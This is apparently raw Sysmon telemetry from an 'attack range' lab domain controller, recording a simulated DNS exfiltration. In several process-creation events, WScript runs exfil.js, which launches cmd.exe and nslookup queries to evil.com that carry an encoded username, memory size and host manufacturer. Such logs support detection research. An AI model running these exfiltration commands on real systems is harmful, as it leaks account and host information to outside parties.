14:16:16.989{2E1864BB-17B0-629A-D03E-000000005F02}76604552C:\Windows\system32\conhost.exe{2E1864BB-17B0-629A-D13E-000000005F02}1636C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.989{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.989{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.989{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.989{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.989{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-D13E-000000005F02}1636C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.989{2E1864BB-17B0-629A-CF3E-000000005F02}73967224C:\Windows\system32\cmd.exe{2E1864BB-17B0-629A-D13E-000000005F02}1636C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.997{2E1864BB-17B0-629A-D13E-000000005F02}1636C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B0-629A-CF3E-000000005F02}7396C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlucf.tmp 2>&1 23542300x800000000000000043920Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:17.370{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1279DCCB620F44E9005CF031EB8876A8,SHA256=CC95CEE49185A7E14870489DB0F6226E2880B838A52F6964879C29FDA132AA36,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.982{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.982{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.982{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.982{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.982{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-023F-000000005F02}652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.982{2E1864BB-17A1-629A-783D-000000005F02}55526960C:\Windows\System32\WScript.exe{2E1864BB-17B2-629A-023F-000000005F02}652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.984{2E1864BB-17B2-629A-023F-000000005F02}652C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnwv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.966{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltnylewz.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.951{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.951{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.951{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.951{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.935{2E1864BB-17B2-629A-FF3E-000000005F02}73607512C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}7564C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.935{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}7564C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.935{2E1864BB-17B2-629A-FE3E-000000005F02}57922872C:\Windows\system32\cmd.exe{2E1864BB-17B2-629A-013F-000000005F02}7564C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.940{2E1864BB-17B2-629A-013F-000000005F02}7564C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B2-629A-FE3E-000000005F02}5792C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltnylewz.tmp 2>&1 23542300x8000000000000000197016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.920{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=030A1C19AC50A0EE506B9ECD49F02A2F,SHA256=A848573A2B0AD3EED3C5C2337F85DD07C45E0A695A71D88A0F6D1C5B8F0B532B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.920{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-003F-000000005F02}7688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.920{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.920{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.920{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 